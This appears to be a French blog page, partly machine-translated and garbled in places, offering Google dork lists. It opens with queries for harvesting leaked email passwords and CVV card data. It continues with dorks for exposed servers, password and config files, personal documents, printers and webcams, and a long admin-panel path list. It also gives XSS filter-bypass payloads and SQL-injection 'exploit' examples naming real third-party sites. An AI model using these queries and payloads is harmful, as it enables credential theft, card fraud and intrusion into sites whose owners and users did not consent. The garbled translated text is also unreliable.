💥 TOP Google HK Dorks & + . . . 2024 *°
Find Username, Password & CVV Data Using Google Dorks 2017
filetype.txt intext:@gmail.com intext:@password
filetype:txt @gmail.com OR @yahoo.com OR @hotmail intext:pass
filetype:txt @gmail.com OR @yahoo.com OR @hotmail intext:password
filetype:txt @gmail.com username password 2015
filetype:txt @gmail.com username password 2016
filetype:txt @gmail.com username password 2017
filetype:txt @gmail.com username password 2017
filetype:txt card cvv 2017
filetype:txt intext:@gmail.com intext:@password
filetype:txt intext:@gmail.com intext:facebook intext:password
filetype:txt intext:@ymail.com intext:facebook intext:password
filetype:txt intext:@ymail.com intext:password
filetype:txt intext:cvv2
filetype:txt intext:facebook intext:@gmail.com intext:password
filetype:txt intext:facebook intext:@yahoo.com intext:password
filetype:txt intext:gmail com facebook password
filetype:txt username @gmail.com password
filetype:xls username password
intext:cvv 2018
inurl.txt cvv 2017
inurl:"passes" OR inurl:"pass" OR inurl:"passwords" OR inurl:"credentials" -search –download
-techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff
inurl:cvv.txt 2016
inurl:cvv.txt 2017
inurl:cvv.txt 2018
inurl:cvv.txt 2019
inurl:cvv.txt 2020
site:extremetracking.com inurl:”login=”
www.HowTechHack.com Page 1
Google Hacking Dorks 2024
Listes Google Dorks 2024
Qu'est-ce que la requête Google Dorks ?
Google Dorks sont des requêtes de recherche avancées qui utilisent des opérateurs et une syntaxe spécifiques pour découvrir des informations difficiles à trouver via de simples recherches. Ils peuvent exploiter les vulnérabilités ou les erreurs de configuration des sites Web, révélant potentiellement des noms d'utilisateur, des mots de passe ou des documents internes.
La Google Hacking Database (GHDB) est une requête d'index de recherche connue sous le nom de Google dorks utilisée par les pentesters et les chercheurs en sécurité pour trouver des ressources avancées.
Pourquoi utiliser Google pour pirater des abrutis
- Requêtes Google pour localiser divers serveurs Web.
- Dorks pour trouver des périphériques réseau .
- Dorks pour localiser les serveurs Web.
Comment récupérer les adresses e-mail de Dorks ?
Marketing + New York + "gmail.com" + site :linkedin.com
site : facebook.com « cybersécurité » « @gmail.com »
Ou si vous voulez un identifiant de messagerie par emplacement, utilisez Dork suivant
site :facebook.com "cybersécurité" "floride" "@gmail.com"
Documents API : pour découvrir les points de terminaison d'API cachés
inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"exemple[.]com"
OneDrive, Firebase et JFrog Artifactory :
recherchez des données sensibles et des comptes d'entreprise
site : http://onedrive.live.com "exemple[.]com" site : http://firebaseio.com "exemple[.]com" site : http://jfrog.io "exemple[.]com"
Extensions : pour rechercher les fuites de fichiers sensibles
site:"exemple[.]com" ext:log | ext:txt | poste:conf | poste:cnf | poste:ini | poste:env | poste:sh | poste:bak | poste: sauvegarde | poste: swp | poste:ancien | poste :~ | poste:git | poste:svn | poste: mot de passe ht | poste : htaccess
Pour les chasseurs d'insectes
intext:bounty inurl:/sécurité inurl:"bug bounty" et intext:"€" et inurl:/security inurl:"bug bounty" et intext:"$" et inurl:/security inurl:"bug bounty" et intext:"INR" et inurl:/security
Requêtes Google pour localiser divers serveurs Web
« Serveur Apache/1.3.28 sur » intitle:index.of
Apache 1.3.2
« Serveur Apache/2.0 sur » intitle:index.of
Apache 2.0
« Serveur Apache/* sur » intitle:index.of
n'importe quelle version d'Apache
« Microsoft -IIS/4.0 Serveur à » intitle:index.of
Microsoft Internet Information Services 4.0
« Microsoft-IIS/5.0 Server à » intitle:index.ofMicrosoft Internet Information Services 5.0
« Microsoft-IIS/6.0 Server à » intitle:index.of
Microsoft Internet Information Services 6.0
« Microsoft-IIS/* Server à » intitle:index.de
toute version de Microsoft Internet Information Services
« Oracle HTTP Server/* Server à » intitle:index.de
toute version d'Oracle HTTP Server
« IBM _ HTTP _ Serveur/* * Serveur à » intitle:index.of
n'importe quelle version d'IBM HTTP Server
« Netscape/* Server at » intitle:index.of
n'importe quelle version de Netscape Server
« Red Hat Secure/* » intitle:index.of
n'importe quelle version de le serveur Red Hat Secure
« Serveur Web basé sur HP Apache/* » intitle:index.de
toute version du serveur HP
Requêtes pour découvrir le standard post-installation
intitle : « Page de test pour l'installation d'Apache » « Vous êtes libre »
Apache 1.2. 6
intitre : « Page de test pour l'installation d'Apache » « Cela a fonctionné ! » "ce site Web!"
Apache 1.3.0 – 1.3.9
intitle : « Page de test pour l'installation d'Apache » « Voir ceci à la place »
Apache 1.3.11 – 1.3.33, 2.0
intitle : « Page de test pour l'installation d'Apache compatible SSL/TLS » « Hé, ça a marché!"
Apache SSL/TLS
intitle : « Page de test pour le serveur Web Apache sur Red Hat Linux »
Apache sur Red Hat
intitle : « Page de test pour le serveur Apache Http sur Fedora Core »
Apache sur Fedora
intitle : « Bienvenue sur votre nouvelle page d'accueil ! »
Debian Apache sur Debian
intitre : « Bienvenue dans IIS 4.0 ! »
Titre IIS 4.0
: « Bienvenue dans les services Internet Windows 2000 » Titre
IIS 5.0
: « Bienvenue dans les services Internet Windows XP Server »
IIS 6.0
Requête de rapports système générés par l'application
« Générés par phpSystem »
Type et version du système d'exploitation, configuration matérielle, utilisateurs connectés, connexions ouvertes, mémoire et espace disque libres, points de montage.
« Ce résumé a été généré par wwwstat »
Statistiques du serveur Web, structure des fichiers système
« Ces statistiques ont été produites par getstats »
Statistiques du serveur Web, structure des fichiers système
« Ce rapport a été généré par WebLog »
Statistiques du serveur Web, structure des fichiers système
intext : « Tobias Oetiker "
Statistiques de performances du système « analyse du trafic » sous forme de graphiques MRTG, configuration du réseau,
titre : »Apache::Status» (inurl:server-status | inurl:status.html | inurl:apache.html)
version du serveur, type de système d'exploitation, liste des processus enfants , connexions actuelles
intitle : "ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
Activité du serveur Web, nombreuses informations sur les visiteurs
intitle : "Page d'état de l'onduleur Multimon"
Statistiques de performances de l'appareil UPS
intitle : "statistiques de" "Statistiques Web avancées"
Statistiques du serveur Web, informations sur les visiteurs,
titre : "Statistiques système" + "Centre d'informations système et réseau"
statistiques de performances du système sous forme de graphiques MRTG, configuration matérielle, services en cours d'exécution
intitle: "Statistiques d'utilisation pour"
Statistiques du serveur Web "Générées par Webalizer", informations sur les visiteurs, structure des fichiers système
intitle: "Statistiques du serveur Web pour ****"
statistiques du serveur Web, informations sur les visiteurs
nurl:"/axs/ax-admin.pl" -script
statistiques du serveur Web, informations sur les visiteurs
inurl:"/cricket/grapher.cgi"
Graphiques MRTG des performances de l'interface réseau
inurl:server-info "Apache Server Information"
serveur Web version et configuration, type de système d'exploitation, structure des fichiers système
« Sortie produite par SysWatch * »
type et version du système d'exploitation, utilisateurs connectés, mémoire libre et espace disque, points de montage, processus en cours d'exécution, journaux système
Dorks pour trouver la page d'administration
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin /login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrateur/
administrateur/index.html
administrateur/ index.php
administrateur/login.html
administrateur/login.php
administrateur/compte.html
administrateur/compte.php
administrateur.php
administrateur.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/ login.html
moderator/admin.php
moderator/admin.html
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici. asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrateur/index.asp
administrateur/login.asp
administrateur/compte .asp
administrateur.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration /
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
monadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Serveur/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
Administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administrer/
LiveUser_Admin/
sys-admin/
typo3/
panel /
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formlogin/
autologin/
support_login
/ meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
Members/
login-redirect/
sub-login/
wp-login/
login1/
dir -login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin /
bbadmin/
vmailadmin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
Administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
phpSQLiteAdmin/
server_admin_small/
database_administration/
system_administration/
Mettre à jour Imp. Pauvre type.
Contournement XSS d'encodage JSON
Paramètre unique multi-réflexion
'"><Svg OnLoad=alerte(1)> '"1='
Contournement XSS – javascript : URI
Si vous pouvez injecter ces balises :
<a> <iframe> <object> <embed>
Mais « javascript : » et « data : » sont bloqués
Essayez ces techniques d'obscurcissement :
java%00script :
java%0Ascript :
java&tab;script :
Exemple :
<a href="java%0Ascript:al%0Aert()">cliquez</a>
Dork : "inurl:dettaglio.php?id="
Exploit :
www.victim.com/sito/dettaglio.php?id=[SQL]
Exemple :
http://www.cicloposse.com/dettaglio.php?id=61′
Dork : inurl:product.php?id)
Exploit :
www.victim.com/prodotto.php?id=[SQL]
Exemple :
http://www.poderimorini.com/en/prodotto.php?id=14′
Lisez aussi – 8 conseils pour sécuriser les informations sur votre site Web
crétins d'injection SQL
allinurl : \"index php go buy\"
allinurl : \"index.php?go=sell\"
allinurl : \"index php go linkdir\"
allinurl : \"index.php?go=resource_center\"
allinurl : \" resource_center.html\"
allinurl : \"index.php?go=properties\"
allinurl : \"index.php?go=register\"
Requêtes de messages d'erreur
"Une erreur de syntaxe s'est produite" type de fichier : ihtml
Erreurs de base de données Informix, contenant potentiellement des noms de fonctions, des noms de fichiers, des informations sur la structure des fichiers, des morceaux de code SQL et des mots de passe
« Accès refusé à l'utilisateur » « Utilisation du mot de passe »
erreurs d'autorisation, contenant potentiellement des noms d'utilisateur, des noms de fonctions, des informations sur la structure des fichiers et des morceaux de code SQL
"Le script dont l'UID est " "n'est pas autorisé à accéder"
erreurs PHP liées à l'accès, contenant potentiellement des noms de fichiers, des noms de fonctions et des informations sur la structure des fichiers
« ORA-00921 : fin inattendue de la commande SQL »
Erreurs de base de données Oracle, contenant potentiellement des noms de fichiers, des noms de fonctions et des informations sur la structure des fichiers
"Erreur trouvée lors du traitement de la demande" type de fichier cocoon : xml
Erreurs Cocoon, contenant potentiellement des informations sur la version de Cocoon, des noms de fichiers, des noms de fonctions et des informations sur la structure des fichiers
«Erreur de base de données de la carte d'alimentation Invision»
Erreurs du tableau d'affichage Invision Power Board, contenant potentiellement des noms de fonctions, des noms de fichiers, des informations sur la structure des fichiers et un morceau de code SQL.
"Attention : mysql _ query()" "requête invalide"
Erreurs de base de données MySQL, contenant potentiellement des noms d'utilisateur, des noms de fonctions, des noms de fichiers et des informations sur la structure des fichiers
"Message d'erreur : Erreur lors du chargement des bibliothèques requises."
Erreurs de script CGI, contenant potentiellement des informations sur les versions du système d'exploitation et des programmes, les noms d'utilisateur, les noms de fichiers et les informations sur la structure des fichiers.
Type de fichier « #mysql dump » :sql
Erreurs de base de données MySQL, contenant potentiellement des informations sur la structure et le contenu de la base de données
Dork pour localiser les mots de passe
http://*:*@www”
mots de passe pour le site, stockés sous la forme de chaîne « http://username:password@www… »
type de fichier : bak inurl : "htaccess|passwd|shadow|ht utilisateurs"
sauvegardes de fichiers, contenant potentiellement des noms d'utilisateur et des mots de passe
type de fichier : mdb inurl : "compte | utilisateurs | administrateur | administrateurs administrateurs | mot de passe | mot de passe"
fichiers mdb, contenant potentiellement des informations de mot de passe
intitle : « Index de » pwd.db
Fichiers pwd.db, contenant potentiellement des noms d'utilisateur et des mots de passe cryptés
inurl:admin inurl:backup intitle:index.of
répertoires dont les noms contiennent les mots admin et backup
« Index de/ » « Répertoire parent » « WS _ FTP.ini »
type de fichier :ini WS _ FTP PWD
Fichiers de configuration WS_FTP, contenant potentiellement des mots de passe d'accès au serveur FTP
ext:pwd inurl:(service|auteurs|administrateurs |utilisateurs) « # -FrontPage- »
fichiers contenant des mots de passe Microsoft FrontPage
type de fichier :sql ("valeurs de mot de passe ****" | "valeurs de mot de passe ****" | "valeurs de passage ****")
fichiers contenant du code SQL et des mots de passe insérés dans une base de données
intitle:index.of trillian.ini
fichiers de configuration pour Trillian IM
Type de fichier Eggdrop : utilisateur
fichiers de configuration utilisateur pour l'ircbot Eggdrop
type de fichier:conf slapd.conf
fichiers de configuration pour OpenLDAP
inurl : « wvdial.conf » intext : « mot de passe »
fichiers de configuration pour WV Dial
ext:ini eudora.ini
fichiers de configuration pour le client de messagerie Eudora
type de fichier : mdb inurl : utilisateurs.mdb
Fichiers Microsoft Access, contenant potentiellement des informations sur le compte utilisateur
Recherche de données personnelles et de documents confidentiels
type de fichier : xls inurl : « email.xls »
Fichiers email.xls, contenant potentiellement des informations de contact
« téléphone * * * » « adresse * » « e-mail » titre : « curriculum vitae »
CV
"pas à distribuer"
documents confidentiels contenant la clause confidentielle
liste d'amis.blt
Liste de contacts AIM
intitle:index.of mystuff.xml
Liste de contacts Trillian IM
type de fichier : ctt « msn »
Liste de contacts MSN
type de fichier : QDF
Fichiers de base de données QDF pour l'application financière Quicken
intitle:index.of finances.xls
Fichiers finances.xls, contenant potentiellement des informations sur les comptes bancaires, des résumés financiers et des numéros de carte de crédit
intitle : "Index de" -inurl : taille du journal de courrier du journal
fichiers maillog, contenant potentiellement du courrier électronique
Rapport d'évaluation des vulnérabilités du réseau »
« Rapport de synthèse sur les vulnérabilités de l'hôte »
type de fichier : pdf « Rapport d'évaluation »
« Ce fichier a été généré par Nessus »
rapports pour les analyses de sécurité du réseau, les tests d'intrusion, etc.
idiot pour localiser les périphériques réseau
« Droits d'auteur (c) Tektronix, Inc. » "état de l'imprimante"
Imprimantes PhaserLink
inurl : "imprimante/main.html" intext : "paramètres"
Imprimantes Brother HL
intitle: « Nouvelles de l'imprimante laser Dell »
Imprimantes Dell avec technologie EWS
intext: centreware inurl: statut
Imprimantes Xerox Phaser 4500/6250/8200/8400
inurl:hp/device/this.LCDispatcher
Imprimantes HP
intitre: liveapplet inurl: LvAppl
Webcams Canon WebView
intitre : "EvoCam" inurl : "webcam.html"
Ils évoquent les webcams
inurl : "ViewerFrame?Mode="
Webcams des caméras réseau Panasonic
(dans le texte : "MOBOTIX M1 ? | dans le texte : "MOBOTIX M10 ?) dans le texte : "Ouvrir le menu" Maj-Recharger
Webcams Mobotix
inurl:indexFrame.shtml Axe
Webcams de l'Axe
intitle: "mon serveur webcamXP!" inurl : : 8080 ?
webcams accessibles via WebcamXP Server
allintitle:Brains, Corp.
webcams des caméras accessibles via mmEye
intitle : « page webcam active »
Commentaires
Enregistrer un commentaire
🖐 Hello,
N'hésitez pas à commenter ou vous exprimer si vous avez des trucs à dire . . .👉